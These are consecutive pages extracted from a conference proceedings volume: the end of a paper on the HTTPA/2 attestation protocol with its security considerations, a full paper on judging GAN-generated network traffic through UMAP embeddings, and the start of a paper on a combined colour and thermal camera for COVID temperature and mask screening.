ii. Attest-Date It is the Coordinated Universal Time (UTC) when client initiates a AtHS. iii. Attest-Signatures It contains a set of signatures, which are used to ensure IntAuth of AHLs in this AtR through client-side signing key (see Sect. 2.5). iv. Attest-Transport As described in Sect. 2.8, the client HELLO message should be put in here. With this, the TService can enforce a trustworthy and secure connection at L5, which is a bit similar to what HTTP Strict Transport Security (HSTS) does [12]. (b) AHFs in response message i. Attest-Version It shows client which version of HTTPA is selected by TService to support. ii. Attest-Transport Similarly, the TService returns its HELLO message to the client for a secure transport layer handshake. iii. Attest-Expires It indicates when the allocated AtB will go expire and its related resources will get released. It provides another layer of security to reduce the chance of this AtB being attacked. iv. Attest-Secrets It is an ordered list of AtB-wide secrets, which are provisioned by TService if client expects them. This way can save a RTT of AtSP (see Sect. 3.3) in case of TService won’t demand secrets from client immediately. v. Attest-Cargo The usage of this field is described in Sect. 2.7. Note that “AttestCargo” is a AHF while TrC is the corresponding content which plays an important role on sensitive data encryption and authentication. Apart from those tasks above, this AtR can act as a GET request, but it cannot be trusted due to incomplete key exchange at this moment, which means it cannot contains any sensitive data, but its response can be trusted as the key exchange process completed at TService-side, and before it gets returned. Therefore, the TService-side sensitive data can be safely transmitted back to the client through the TrC.
3.3
Attest Secret Provisioning (AtSP) Phase
As mentioned in Sect. 3.2, the main purpose of AtSP is to securely deliver secrets to a trustworthy AtB, which has been verified by a server-side verifier. The AtR of AtSP is intended to be used for this purpose. To be precise, it is for AtBwide and client-wide secret provisioning. On the contrary, the request-wide or
840
G. King and H. Wang
Fig. 3. Attest secret provisioning (AtSP) transaction
response-wide secrets should be carried by the TrCs (see Sect. 2.7) of HTTPA/2 transactions. In addition, the failure of AtSP will causes AtB termination immediately. As shown in Fig. 3, the AtSP transaction can be used to provision secrets in two directions since the AtB and its key materials already got derived through AtHS (see Sect. 3.2) on both sides; thus, the AHLs can be fully protected during this phase. Moreover, AtR of AtSP can be issued by the client any number of times at anytime after AtHS. These AHLs described in following: 1. AHFs in request message (or AtR) (a) Attest-Base-ID This identifier is used to specify which AtB is targeted to handle this AtR of AtSP. With this ID, the TService can firstly validate it against its serving list to make sure correctly handling of this request (see 4.2 in Fig. 3). However, the TService should quietly ignore it if the ID is not valid for its residing AtB as the receiving TService should not expose any information for an adversary to exploit. (b) Attest-Ticket The usage of this field is explained in Sect. 2.5. The value of this field must be unique to prevent a replay attack. Also, it ensures the IntAuth of the AHLs in this request. (c) Attest-Secrets It contains an ordered list of secrets, which is wrapped up by means of AE as a standard way for strong protection. Moreover, each secret should be able to be referred to by the client later using the index. For example, specifying a provisioned secret that is used to decrypt embedded
HTTPA/2
841
sensitive data. Again, the receiving AtB should be terminated if any of these provisioned secrets cannot be validated or accepted by the AtB (see 4.3 in Fig. 3). (d) Attest-Cargo This field is optional, it can be used to carry any sensitive information, which is meaningful to TService (see Sect. 2.7). Note that this paper is not intended to define the structure of its content, which could be addressed in another one. 2. AHFs in response message: (a) Attest-Binder It is used to make sure the request to response is binding together to identify this transaction uniquely (see Sect. 2.6). (b) Attest-Secrets In this HF, these contained wrapped secrets will be provisioned back to the client. As noted earlier, this can be merged into the response AHLs in AtR of AtHS (see Sect. 3.2). (c) Attest-Cargo Similarly, it can be used to carry sensitive information/data back to the client (see Sect. 2.7). 3.4
Trusted Communication Phase
Fig. 4. Trusted transaction
842
G. King and H. Wang
When AtB is allocated for the client, it can subsequently issue TrR (see Sect. 2.4) to do the real work. Basically, the TrR is an ordinary AHLs request with some extra AHLs, which are described in detail as follows: 1. AHFs in request message: (a) Attest-Base-ID It specifies which AtB to handle this request, and should be validated by targeting TService (see 5.2 in Fig. 4) before processing this request (see 5.3 in Fig. 4). (b) Attest-Ticket This field has been explained above (see Sect. 2.5), which is intended to authenticate this request, and prevent other AHLs from being tampered with or being replayed. (c) Attest-Cargo As noted earlier, this field is optional, and the client can use it to transfer arbitrary sensitive information to TService (see Sect. 2.7). (d) Attest-Base-Termination We can include this AHF if it is the last TrR towards the AtB. It is recommended way to terminate a AtB actively. The termination method can be one of the following options: Cleanup This means that the terminated AtB can be reused by other clients. Destroy Specify this method, if the AtB should not be reused or shared by any other clients. Keep This allows AtB to be shared with other clients. Be careful, this method is less safe as the residual data could be exploited and leaked to the next client if any. 2. AHFs in response message: (a) Attest-Binder As explained earlier, the HTTPA/2 uses it to ensure the IntAuth of both request and response together (see Sect. 2.6). (b) Attest-Cargo As noted earlier, the TService can leverage this mechanism to transfer arbitrary sensitive information back to its client (see Sect. 2.7).
3.5
Protocol Flow
As shown in Fig. 5, we illustrate those transactions from client perspective, including preflight, AtHS, AtSP, and trusted request in a workflow diagram. In the design of HTTPA/2, only the phase of AtHS is required, which not only largely simplifies the interaction between the client and the TService but also improves the user experience (UX).
HTTPA/2
843
Figure 6 shows the workflow, which can help understand how those transactions are distinguished in TService.
Fig. 5. HTTPA transaction workflow from the client view
844
G. King and H. Wang
Fig. 6. HTTPA Transaction Workflow from the TService View
4
Security Considerations
In this section, we discuss security properties and the potential vulnerabilities, as is necessary for understanding HTTPA/2. 4.1
Layer 7 End-to-End Protection
In cloud computing scenarios, intermediary nodes, such as L7 load balancer or reverse proxy, are used commonly to improve the network performance to deliver the best web experience. However, the great web experience does not come for free. The secure communication based on TLS only protects transmitted data hop-by-hop at layer 5 (L5). The intermediary nodes may need TLS termination to inspect HTTP messages in plain text for better network performance. As a consequence, the intermediary nodes can read and modify any HTTP information at L7. Although TLS itself is not the problem, it cannot protect sensitive information above L5 where most Web services are located. That is the gap between L5 and L7 that causes the underlying vulnerability. Therefore, the trust model including intermediary nodes, which are over L5, is problematic [23], because, in reality, intermediary nodes are not necessarily trustworthy. Intermediary nodes may leak the privacy and manipulate the header lines of AHLs message. Even in the case, where intermediaries are fully trusted, an attacker may exploit the vulnerability of the hop-by-hop architecture and lead to data breaches. HTTPA/2 helps protect AHLs and the sensitive information of HTTP message end-to-end at L7. As long as the protection does not encrypt the necessary information against proxy operations [23], HTTPA/2 can provide guarantees that the protected message can survive across middleboxes to reach the endpoint. Especially, HTTPA/2 provides an encryption mechanism at the level of HTTP message, where only the selected information, some header lines or payloads, is encrypted rather than the entire message. Thus, the parts
HTTPA/2
845
of HTTPA information without protection may be exploited to spoof or manipulate. If we want to protect every bit of HTTPA message hop-by-hop, TLS is highly recommended in combine with HTTPA/2 for use. In the implementation, the TServices can make a privacy policy to determine to what degree the HTTPA message is protected to the L7 endpoint without TLS for better network performance. If the message is highly sensitive entirely, TLS can come to help in addition, but only up to the security of the L5 hop point. 4.2
Replay Protection
A replay attack should be considered in terms of design and implementation. To mitigate replay attacks, most AEAD algorithms require a unique nonce for each message. In AtR, random numbers are used. In TrR, a sequential nonce is used on either endpoint accordingly. Assuming strictly increasing numbers in sequence, the replay attack can be easily detected if any received number is duplicated or no larger than the previously received number. For reliable transport, the policy can be made to accept only TrR with a nonce that is equal to the previous number plus one. 4.3
Downgrade Protection
The cryptographic parameters of configuration should be the same for both parties as if there is no presence of an attacker between them. We should always negotiate the preferred common parameters with the peer. If the negotiated parameters of configuration are different for both parties, it could make peers use a weaker cryptographic mode than the one they should use, thus leading to a potential downgrade attack [7]. In HTTPA/2, TService uses AtQ to authenticate its identity and the integrity of the AtHS to the client. In mHTTPA/2, the client uses AtQ carried by AtR for proving its own authenticity and the message integrity. Thus, the communication traffic of the handshake across intermediaries cannot be compromised by attackers. 4.4
Privacy Considerations
Privacy threats are considerably reduced by means of HTTPA/2 across intermediary nodes. End-to-end access restriction of integrity and encryption on the HTTPA/2 AHLs and payloads, which are not used to block proxy operations, aids in mitigating attacks to the communication between the client and the TService. On the other hand, the unprotected part of HTTP headers and payloads, which is also intended to be, may reveal information related to the sensitive and protected parts. Then privacy may be leaked. For example, the HTTP message fields visible to on-path entities are only used for the purpose of transporting the message to the endpoint, whereas the AHLs and its binding payloads are encrypted or signed. It is possible for attackers to exploit the visible parts of HTTP messages to infer the encrypted information if the privacy-preserving policy is not well set up. Unprotected error messages can reveal information about
846
G. King and H. Wang
the security state in the communication between the endpoints. Unprotected signaling messages can reveal information about reliable transport. The length of HTTPA/2 message fields can reveal information about the message. TService may use a padding scheme to protect against traffic analysis. After all, HTTPA/2 provides a new dimension for applications to further protect privacy. 4.5
Roots of Trust (RoT)
Many security mechanisms are currently rooted in software; however, we have to trust underlying components, including software, firmware, and hardware. A vulnerability of the components could be easily exploited to compromise the security mechanisms when the RoT is broken. One way to reduce that risk of vulnerability is to choose highly reliable RoT. RoT consists of trusted hardware, firmware, and software components that perform specific, critical security functions [4]. RoT is supposed to be trusted and more secure, so it is usually used to provide strong assurances for the desired security properties. In HTTPA/2, the inherent RoT is the AtB or TEEs, which provide a firm foundation to build security and trust. With AtB being used in HTTPA/2, we believe that the risks to security and privacy can be greatly reduced.
5
Conclusion
In this paper, we propose the HTTPA/2 protocol, a major revision of HTTPA/1. HTTPA/2 is a layer 7 protocol that builds trusted end-to-end communication between Hypertext Transfer Protocol (HTTP) endpoints. An integral part of HTTPA/2 is based on confidential computing, e.g., TEE, which is used to build verifiable trust between endpoints with remote attestation. Communication between trusted endpoints is better protected across intermediary nodes which may not have TLS protection. This protection helps prevent HTTPA/2 metadata and the selected HTTP data from being compromised by internal attackers, even with TLS termination. In addition to security advantage, the HTTPA/2 also illustrates the performance advantages over HTTPA/1, as it is not mandatory to enforce TLS; hence the overheads of TLS can be saved. Furthermore, HTTPA/2 provides flexibility for a service provider to decide which part of the HTTP message is required to be protected. This feature can potentially be leveraged by CSPs to optimize their networking configuration and service deployment to improve the throughput and response time. With those improvements, the energy of electricity can be saved as well.
6
Future Work
To further realize HTTPA/2 in the real world, we will be focused on proof-ofconcept (PoC) to demonstrate its validness and soundness. We will apply the
HTTPA/2
847
PoC codes of HTTPA/2 to various use cases in practice. Lastly, we plan to release a reference implementation towards generalization to open source. In the future, we expect emerging private AI applications to leverage HTTPA/2 to deliver its end-to-end trusted service for processing sensitive data and protecting model IP. HTTPA/2 will enable Trust-as-a-Service (TaaS) for more trustworthy Internet. With HTTPA/2 and TaaS, Internet users will have freedom of choice to trust, the right to verify assurances, and the right to know the verified details. Users are able to make their decision out of free will based on the faithful results that they consider and choose to believe. It becomes possible that we can build genuine trust between two endpoints. Thus, we believe that HTTPA/2 will accelerate the transformation process towards trustworthy Internet for a better digital world.
7
Notices and Disclaimers
No product or component can be absolutely secure. Acknowledgments. We would like to acknowledge the support from the HTTPA workgroup members, including our partners and reviewers. We thank their valuable feedback and suggestions.
References 1. 2. 3. 4. 5.
6. 7.
8.
9. 10. 11.
Execution environments Innovative technology for CPU based attestation and sealing Remote attestation Roots of trust (RoT) Backman, A., Richer, J., Sporny, M.: HTTP message signatures draft-ietf-httpbismessage-signatures-08. Technical report, Internet-Draft. IETF (2019). https:// www.ietf.org/archive/id/draft-ietf-httpbis-message-signatures-08.html Banks, A.S., Kisiel, M., Korsholm, P.: Remote attestation: a literature review. CoRR, abs/2105.02466 (2021) Bhargavan, K., Brzuska, C., Fournet, C., Green, M., Kohlweiss, M., ZanellaB´eguelin, S.: Downgrade resilience in key-exchange protocols. In: 2016 IEEE Symposium on Security and Privacy (SP), pp. 506–525. IEEE (2016) Birkholz, H., Thaler, D., Richardson, M., Pan, W., Smith, N.: Remote attestation procedures architecture draft-ietf-rats-architecture-12. Technical report, InternetDraft. IETF (2021). https://www.ietf.org/archive/id/draft-ietf-rats-architecture12.html Fielding, R.T., Reschke, J.: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing. RFC 7230, June 2014 Fielding, R.T., Reschke, J.: Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content. RFC 7231, June 2014 Helble, S.C., Kretz, I.D., Loscocco, P.A., Ramsdell, J.D., Rowe, P.D., Alexander, P.: Flexible mechanisms for remote attestation. ACM Trans. Priv. Secur. 24(4), 1–23 (2021)
848
G. King and H. Wang
12. Hodges, J., Jackson, C., Barth, A.: HTTP Strict Transport Security (HSTS). RFC 6797, November 2012 13. Jauernig, P., Sadeghi, A.-R., Stapf, E.: Trusted execution environments: properties, applications, and challenges. IEEE Secur. Priv. 18(2), 56–60 (2020) 14. King, G., Wang, H.: HTTPA: HTTPS attestable protocol (2021) 15. Krawczyk, H., Eronen, P.: HMAC-based Extract-and-Expand Key Derivation Function (HKDF). RFC 5869, May 2010 16. Krawczyk, H.: SIGMA: the ‘SIGn-and-MAc’ approach to authenticated DiffieHellman and its use in the IKE protocols. In: Boneh, D. (ed.) CRYPTO 2003. LNCS, vol. 2729, pp. 400–425. Springer, Heidelberg (2003). https://doi.org/10. 1007/978-3-540-45146-4 24 17. Langley, A., Hamburg, M., Turner, S.: Elliptic Curves for Security. RFC 7748, January 2016 18. McGrew, D.: An Interface and Algorithms for Authenticated Encryption. RFC 5116, January 2008 19. M´en´etrey, J., G¨ ottel, C., Pasin, M., Felber, P., Schiavoni, V.: An exploratory study of attestation mechanisms for trusted execution environments (2022) 20. Nir, Y., Josefsson, S., P´egouri´e-Gonnard, M.: Elliptic Curve Cryptography (ECC) Cipher Suites for Transport Layer Security (TLS) Versions 1.2 and Earlier. RFC 8422, August 2018 21. Nottingham, M., Kamp, P.-H.: Structured Field Values for HTTP. RFC 8941, February 2021 22. Rescorla, E.: The Transport Layer Security (TLS) Protocol Version 1.3. RFC 8446, August 2018 23. Selander, G., Mattsson, J.P., Palombini, F., Seitz, L.: Object Security for Constrained RESTful Environments (OSCORE). RFC 8613, July 2019
Qualitative Analysis of Synthetic Computer Network Data Using UMAP Pasquale A. T. Zingo(B) and Andrew P. Novocin University of Delaware, Newark, DE, USA [email protected]
Abstract. Evaluating the output of Generative Adversarial Networks (GANs) trained on computer network traffic data is difficult. In this paper, we introduced a strategy using fixed low-dimensional UMAP embeddings of network traffic to compare source and synthetic network traffic qualitatively. We found that UMAP embeddings gave a natural way to evaluate the quality of generated data and infer the fitness of the generating model’s hyperparameters. Further, this evaluation matches with quantitative strategies such as GvR. This strategy adds to the toolbox for evaluating generative methods for network traffic and could be generalized to other tabular data sources which are not easily evaluated. Keywords: Computer network traffic network · GvR · UMAP
1 1.1
· Generative adversarial
Introduction Problem Statement
The evaluation on Generative Adversarial Networks for computer network traffic data is difficult, and the leading strategies are focused on quantitative pointestimates of the quality of generated traffic. There is currently a lack of strategies for evaluating entire synthetic datasets for quality and accuracy with respect to source data sets. GANs thrive in the image domain where humans can quickly evaluate the quality of generated data, and so the authors seek to create high quality visualizations of generated data to empower faster iteration on GAN design in the Computer Network Traffic domain. 1.2
Motivation
Labeled network traffic is necessary for use in computer network security training simulations (such as cyber-range) and for training Network Intrusion Detection Systems (NIDS) based on Machine Learning (ML) technologies. Because recording and labeling network traffic from real networks is expensive, time-consuming and creates risk for the source organization, attempts have been made to synthesize computer network traffic. In addition to simulation strategies that create c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 849–861, 2023. https://doi.org/10.1007/978-3-031-28073-3_56
850
P. A. T. Zingo and A. P. Novocin
computer networks and script high-level behavior to generate traffic datasets, generative data methods have been implemented in the traffic domain. Some of these methods use Generative Machine Learning (GML) models such as Generative Adversarial Networks (GAN) and Variational Auto Encoders (VAE). These models have several benefits, being largely automated in tuning a generator to an existing source dataset, and they have shown great success in the image domain where they were primarily designed. However, GML models for the image domain can easily be evaluated by humans, who are experts at evaluating the quality of images and determining if they are natural. In computer networks traffic and other tabular data domains, the appropriateness of synthetic data is not easy to determine. 1.3
Proposed Solution
While many proposed solutions offer point estimation metrics for the appropriateness of generated network traffic along given dimensions of interest, evaluation remains difficult. In this work we consider a holistic approach to generated data by bringing it back into the image domain through the use of UMAP embedding. UMAP is a dimension reduction technique, and is used here to leverage it’s ability to generate reusable embedding which can be used to visualize data other than it’s training set. Our strategy is to identify a useful projection of the source dataset, and then to project the synthetic data into the same space, and to evaluate by visual inspection the appropriateness of the synthetic data. Here we assume that synthetic data which reflects the distribution of traffic from a real source will be projected into similar parts of the embedded space. The validity of this assumption is addressed in Sect. 5. 1.4
Paper Roadmap
Section 2 covers background details regarding the current state of network traffic GANs and their evaluation techniques, as well as the CTGAN model and UMAP tool used in this work. In Sect. 3 the methodology proposed in this paper is detailed, and in Sect. 4 we detail an implementation to illustrate the methodology. Section 5 discusses the results of Sect. 4, and in 6 we speculate on ways to further improve and explore this methodology.
2 2.1
Background and Literature Review Computer Network Traffic and Classification
This work focuses on the computer network traffic domain, specifically with interest in this data as it can be applied to Intrusion Detection Systems (IDS) powered by Machine Learning (ML). IDS are systems to monitor network traffic and determine for each packet, flow, etc. whether it’s behavior is malicious. This problem grows in importance as the size of networks and the number of bad
UMAP for Synthetic Computer Network Traffic
851
actors increases, and is further troubled by the changing environment of attacks and attack surfaces. Ideally, IDS systems should be fast to adapt as new data is recorded and attacks are detected. In practice, most IDS are hand-crafted by experts on the attacks and risks to a specific system. ML has shown success in classifying traffic for well known traffic datasets, but most public datasets are out of data, small, or simulated. Some reasons for the insufficiency of existing data sets are: – Releasing real, high quality traffic data poses a security risk to the institution that created it. Credentials, trade secrets, and personal identifying information of employees are all risked by publishing traffic data. – Accurate labeling of traffic data is expensive. In a simulated environment, the class of traffic is known before the traffic is created, making labeling trivial. However in a real environment, experts must label traffic according to rules, or else by inspection. For datasets with millions of observations, this is prohibitive. A proposed solution is to use Generative Machine Learning to capture the significant patterns in real traffic data, and to generate observations that do not exist in the original data set but are from the same distribution and guaranteeing some degree of anonymization of the underlying dataset. While promising, this strategy has some current limitations. 2.2
Generative Machine Learning
GANs for Image Data. Among algorithms in Generative Machine Learning, Generative Adversarial Networks (GANs) and their variants are currently state of the art. GANs were introduced to create realistic image data by determining the distribution of an existing image data set and sampling it. Since their introduction in 2014, image GANs have quickly improved to generate many kinds of data, and can create photorealistic images [2]. GANs for Traffic Data. Several attempts to generate network traffic data with GAN have been attempted. In [4], traffic flows were generated using WGAN-GP [3] trained on data from a simulated internal network. In [1] the first 784 bits of packets were generated from 3 classes of simple network requests (ping etc.). 2.3
Synthetic Traffic Evaluation
Schoen et al. [5] introduced a taxonomy for network traffic GAN evaluation according to 4 goals for the traffic: – Realism (fidelity): The sample should follow the same distribution as the real data. – Diversity (fairness): Generated samples should have the same variation as real data.
852
P. A. T. Zingo and A. P. Novocin
Fig. 1. The GvR metric construction diagram.
– Originality (authenticity): Generated samples should be sufficiently different from the real samples. – Compliance: Samples that could not exist according to the constraints of the real system should never be generated. The authors note that the criteria Realism and Originality are at odds. We add to this that for applications where the privacy of the underlying data is important, Originality becomes more important. Below, we discuss the existing strategies for Traffic-GAN evaluation: Domain Knowledge Check. Domain Knowledge Checks (DKCs) measure Compliance of the generated traffic. In [4], synthetic flows were then evaluated according to several system-constraint rules that followed from the original dataset such as: – If the transport protocol is UDP, then the flow must not have any TCP flags. – The CIDDS-001 data set is captured within an emulated company network. Therefore, at least one IP address (source IP address or destination IP address) of each flow must be internal (starting with 192.168.XXX.XXX). – If the flow describes normal user behavior and the source port or destination port is 80 (HTTP) or 443 (HTTPS), the transport protocol must be TCP. 23 – If the flow describes normal user behavior and the source port or destination port is 53 (DNS), the transport protocol must be UDP.
UMAP for Synthetic Computer Network Traffic
853
Fig. 2. The MNIST digits dataset embedded with UMAP.
– If a multi- or broadcast IP address appears in the flow, it must be the destination IP address. Domain Knowledge Checks (DKCs) insist that the data generated could have occurred in the source network, but do not ensure any degree of variation in data generation. A trivial generator that only reproduces a single sample memorized from the source data set would pass similar DKCs with 100% accuracy, but fails any check based on Realism, Diversity or Originality. Traffic Viability. In [1] the results were evaluated according to the success rate of those packets being sent across a network. Similar to [4], this is a measure of Compliance, and the same trivial attack would defeat this evaluation technique without requiring the generator to learn the generating distribution. GAN vs Real (GvR). The GvR metric was introduced in [8] (see Fig. 1). GvR is a general quantitative strategy for evaluating Traffic GANs. Under GvR a classifier CR is trained on the real dataset, and another classifier CS with
854
P. A. T. Zingo and A. P. Novocin
identical hyperparameters is trained on the synthetic output of a generative model trained on the real data. Both CR and CS are used to predict on data held out from the full dataset, and the difference CR (d) − CS (d) in score is the “GvR Score”. The accuracy of the real classifier is expected to be greater than that of the synthetic classifier, in which case the score will be positive. The more accurately the generative model captures the real dataset, the better the synthetic classifier will perform and so the smaller the GvR score becomes. 2.4
CTGAN
CTGAN [7] was introduced in 2019. While most GANs are designed to work with image data and the underlying assumptions therein (continuous values, the insignificance of small perturbations of value, the relationship of adjacent values), CTGAN is optimized to work on tabular and categorical data. This better reflects the assumptions necessary for computer network traffic data, and so is used in the case study below. 2.5
UMAP Embedding
Uniform Manifold and Approximation Projection is a new strategy for representing clusters of high-dimensional data in 2 dimensions that balances 2 concerns when embedding (see Fig. 2): – Similar points should be within the same cluster – The distance between clusters should correspond to similarity This strategy has been used previously on [6] as a preprocessing step before clustering traffic to detect traffic anomalies.
3
Proposed Methodology
Given a source dataset D and a generative model trained on the dataset GD : 1. 2. 3. 4. 5.
Train a UMAP Ureal embedding on D Generate visualization Vreal for the D under Ureal Sample GD to create synthetic dataset Dsynthetic Generate visualization Vsynthetic for Dsynthetic under Ureal Compare Vreal with Vsynthetic .
Alternate to the last step, compare the embeddings of multiple generators to determine the one that performs best under the UMAP embedding trained for the real data.
UMAP for Synthetic Computer Network Traffic
855
Fig. 3. The real embedded packets used to fit the UMAP embedding.
4
Case Study
4.1
Plan
In this case study, we demonstrate the variation of embedded data under a fixed UMAP embedding fit to real data, as well as the behavior of synthetic data under that embedding. Our goal is to find if data transformed under a UMAP embedding fit to real data can helpfully distinguish among varying qualities of synthetically generated data. For the UMAP embedding to be helpful, we require that a well trained generator’s samples should closely resemble the embedding of real data, and the embedding of a poorly trained generator should degrade significantly. To the latter point, we note that if the embedding maintains it’s structure independent of the quality of the data (e.g. embedding random noise), then UMAP is not sensitive enough for this task. 4.2
Data Preparation
For this experiment, a Social Media Network Packet dataset1 was used. Duplicate packets were removed, and only header features were used, resulting in a dataset 1
This dataset was provided by the U.S. Army CCDC, C5ISR Center. For information contact Metin Ahiskali ([email protected]).
856
P. A. T. Zingo and A. P. Novocin
of 213,029 observations with 12 features, one of which being the ’Label’. This Label feature which was one-hot-encoded for embedding, resulting in 17 features passed to UMAP. The Labels inform which social media service the packets were associated with: – – – – – –
Viber WhatsApp Twitter Skype Telegram Other (unlabeled).
Due to speed limitations, 2,000 packets from each class were randomly sampled for each run, giving a dataset of 12,000 packets for fitting, and an additional 12,000 packets for validating. Generators were sampled in the same proportion, so that each image contains a balanced sample of the 5 classes as well as the ’Other’/noise class. 4.3
Generators
Two Generator types are used in this experiment: 1. The Empirical Distribution of the dataset 2. CTGAN Data sampled according to the Empirical Distribution of the dataset only has information about the distribution of each feature independently, and any relationships between features are lost. This method is used as a naive generator, to test if a poorly parameterized generator will have clear deviations from the real embedded data. CTGAN is designed specifically for tabular datasets, and is here used as a sophisticated generator. Given a good parameterization, it should generate data very similar to the original data set, which in turn should be reflected in it’s transformation under the UMAP embedding. 4.4
Real Data is Embedded
A UMAP model is fit to the real data sample, the transformation of which can be see in Fig. 3. This embedding is used again to transform the held-out real sample of the same size in Fig. 4, which shows slight variation form Fig. 3 but has identical structure. If a generator is perfect in it’s modeling of the generating distribution, we would expect it’s output under this transformation to have approximately the same amount of variation form Fig. 3 as is present in Fig. 4.
UMAP for Synthetic Computer Network Traffic
857
Fig. 4. More real packets from the same dataset as Fig. 3 under the same embedding
4.5
Synthetic Data is Embedded
Now, generators trained on the real data set are sampled (as above, 2,000 samples from each class) and are transformed under the same embedding that was trained on real data. In Fig. 5, shows the transformation of data sampled from CTGAN. We observe that the clusters are still intact, but there data is substantially noisier than the held-out real data. Moreover, most samples are generated into the correct cluster, but some are clearly in other clusters. The empirically sampled data in Fig. 6 sees most of the clusters degenerate, with some disappearing and others merging (see the three distinct clusters of green WhatsApp packets in Fig. 3 [middle left] which have merged in Fig. 6). Here, separation between clusters of different classes has also broken down.
5 5.1
Results and Discussion Held-Out vs. GAN vs. Empirical Distribution
Comparing the embedded of out-of-sample real data (Fig. 4), the CTGANgenerated data (Fig. 5) and the empirically distributed data (Fig. 6), we see a progressive degradation of the embedding structure found in the original data
858
P. A. T. Zingo and A. P. Novocin
Fig. 5. GAN-Generated packets under the same UMAP embedding as Fig. 3.
(Fig. 3). The difference between empirically generated packets and those generated by CTGAN is exaggerated versus, say, the difference between two models of slightly differing parameters, but was here used to demonstrate the sensitivity of UMAP. We conclude that UMAP embeddings can reflect the quality of the data with respect to its similarity to the source data that was used to build an embedding, and can therefore be used confidently in evaluating traffic GANs holistically. 5.2
Comparison with Quantitative Measures
In order to confirm the intuition that UMAP is effectively reflecting the data based on similar embeddings, we calculated the GvR score for each data set. A Random Forest Classifier was trained on the original data used to construct the embeddings and displayed in Fig. 3 using cross-validation. Below in Table 1 the GvR scores of the data from Figs. 5 and 6. We note that GvR reports a higher quality of data as the accuracy of the synthetic classifier approaches the performance of the real classifier, at which point the GvR score falls to zero. Our expectation, that the data generated by CTGAN should perform poorly
UMAP for Synthetic Computer Network Traffic
859
Fig. 6. Empirically sampled packets under the same UMAP embedding as Fig. 3.
compared to the held-out data and better than the empirically generated data is confirmed. Therefore we see that the intuition holds with respect to GvR analysis of the synthetic data sets. Table 1. RFC Accuracy and GvR scores of synthetic and empirical data Metric
5.3
Real Test CTGAN Empirical
Accuracy 0.648
0.358
0.178
GvR
0.290
0.469
–
Behavior of UMAP
We note that the UMAP clusters for this packet data are less clear than those in the MNIST dataset. The authors suggest several possible reasons, including the implicit underlying complexity of the data, as well as the prevalence of categorical data in the packet header dataset.
860
P. A. T. Zingo and A. P. Novocin
Fig. 7. The data used to train the embedding highlighted depending on if the page had (from Left to Right) an ACK Flag, PSH Flag, Or if the Packet did NOT have TLS.
Of the 17 features exposed for embedding, all but 3 are binary. As a result, when displaying the embedding under different colors it becomes clear that the embedding is addressing the competing claims of the many categories that an observation may belong to. The 3 plots in Fig. 7 are each colored by a category different from the class label, and help to explain the fractured appearance of the packet embedding.
6 6.1
Future Work Hyperparameter Search for Quality Embedding
In order to use UMAP for this application, a considerable amount of time was spent finding a high-quality UMAP embedding for this dataset, which lead to the choice to use 12,000 subsample datasets instead of data on the scale of the original packet header dataset (>1 M packets). UMAP has several hyperparameters that impact the style and quality of the embedding. Computation time to construct embeddings was considerable, and application to new data takes longer still. Work over several traffic datasets and analysis of the impacts of categorical data should result in standard, high quality UMAP parameters for researchers. 6.2
Use in Traffic GAN Tuning
The authors work towards the use of GAN models to anonymize computer traffic datasets. This UMAP technique offers an insight into the trade-off between Realism, Diversity and Originality described in the GAN evaluation taxonomy from [5] which will aid in finding the limit of pattern transmission through the GAN without memorization.
References 1. Cheng, A.: PAC-GAN: packet generation of network traffic using generative adversarial networks. In: 2019 IEEE 10th Annual Information Technology, Electronics and Mobile Communication Conference (IEMCON), pp. 0728–0734 (2019) 2. Goodfellow, I., et al.: Generative adversarial nets. In: Advances in Neural Information Processing Systems, pp. 2672–2680 (2014)
UMAP for Synthetic Computer Network Traffic
861
3. Gulrajani, I., Ahmed, F., Arjovsky, M., Dumoulin, V., Courville, A.C.: Improved training of Wasserstein GANs. In: Guyon, I., et al. (eds.), Advances in Neural Information Processing Systems, vol. 30, pp. 5767–5777. Curran Associates, Inc. (2017) 4. Ring, M., Schlor, D., Landes, D., Hotho, A.: Flow-based network traffic generation using generative adversarial networks. CoRR, abs/1810.07795 (2018) 5. Schoen, A., Blanc, G., Gimenez, P.F., Han, Y., Majorczyk, F., Me, L.: Towards generic quality assessment of synthetic traffic for evaluating intrusion detection systems. In: RESSI 2022 - Rendez-Vous de la Recherche et de l’Enseignement de la S´ecurit´e des Syst`emes d’Information, pp. 1–3, Chambon-sur-Lac, France, May 2022 6. Syal, A.: Automatic network traffic anomaly detection and analysis using supervised machine learning techniques. PhD thesis (2019) 7. Xu, L., Skoularidou, M., Cuesta-Infante, A., Veeramachaneni, K.: Modeling tabular data using conditional GAN. CoRR, abs/1907.00503 (2019) 8. Zingo, P., Novocin, A.: Can GAN-generated network traffic be used to train traffic anomaly classifiers? In: 2020 11th IEEE Annual Information Technology, Electronics and Mobile Communication Conference (IEMCON), pp. 0540–0545 (2020)
Device for People Detection and Tracking Using Combined Color and Thermal Camera Pawel Woronow1 , Karol Jedrasiak2(B) , Krzysztof Daniec1 , Hubert Podgorski1 , and Aleksander Nawrat1 1
Silesian University of Technology, Gliwice, Poland 2 WSB University, Wroclaw, Poland [email protected]
Abstract. This paper presents the developed device created for detection and tracking of people and their faces and temperatures. The solution does not require internet access to operate, so it can be used anywhere. The so called Covid camera is designed to automate the process of measuring temperature and verifying that a person is wearing a mask. The results obtained when testing the device in real conditions are promising and will form the basis for further application research. It is worth noting that the solution was tested in real conditions. Keywords: COVID-19 Mask detection
1
· Image processing · Measuring temperature ·
Introduction
The main objective of the conducted research was to develop an effective solution for screening people suspected of coronavirus infection based on common symptoms of COVID-19 disease. The developed solution presented in this paper is non-contact and enables continuous monitoring and reliable detection using artificial intelligence algorithms based on deep learning. The solution analyzes the recorded data at a frequency of no less 10 Hz, i.e. without the need to create measurement queues, and is equipped with an alarm module that informs specialist personnel about the detection of a person at risk of infection. The solution allows simultaneous analysis of up to 10 people from a safe distance of not less than the recommended distance, i.e. 2 m as opposed to testing with a handheld thermometer as at present. The temperature measurement is done in such a way that the device can be ultimately installed in tight passageways, checkpoints and room entrances. The solution uses a set of artificial intelligence algorithms to analyze the video stream from a thermal and video camera to recognize a person’s face and then measure body temperature, even if the face is covered by a mask, glasses, headgear, or other accessories. Normal body temperature depends on: age, recent activity, individuality, and time of day. The literature assumes that normal body temperature is between 36.1 ◦ C and 37.2 ◦ C. All detected abnormalities will be signaled by the alarm module audibly/visually c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai 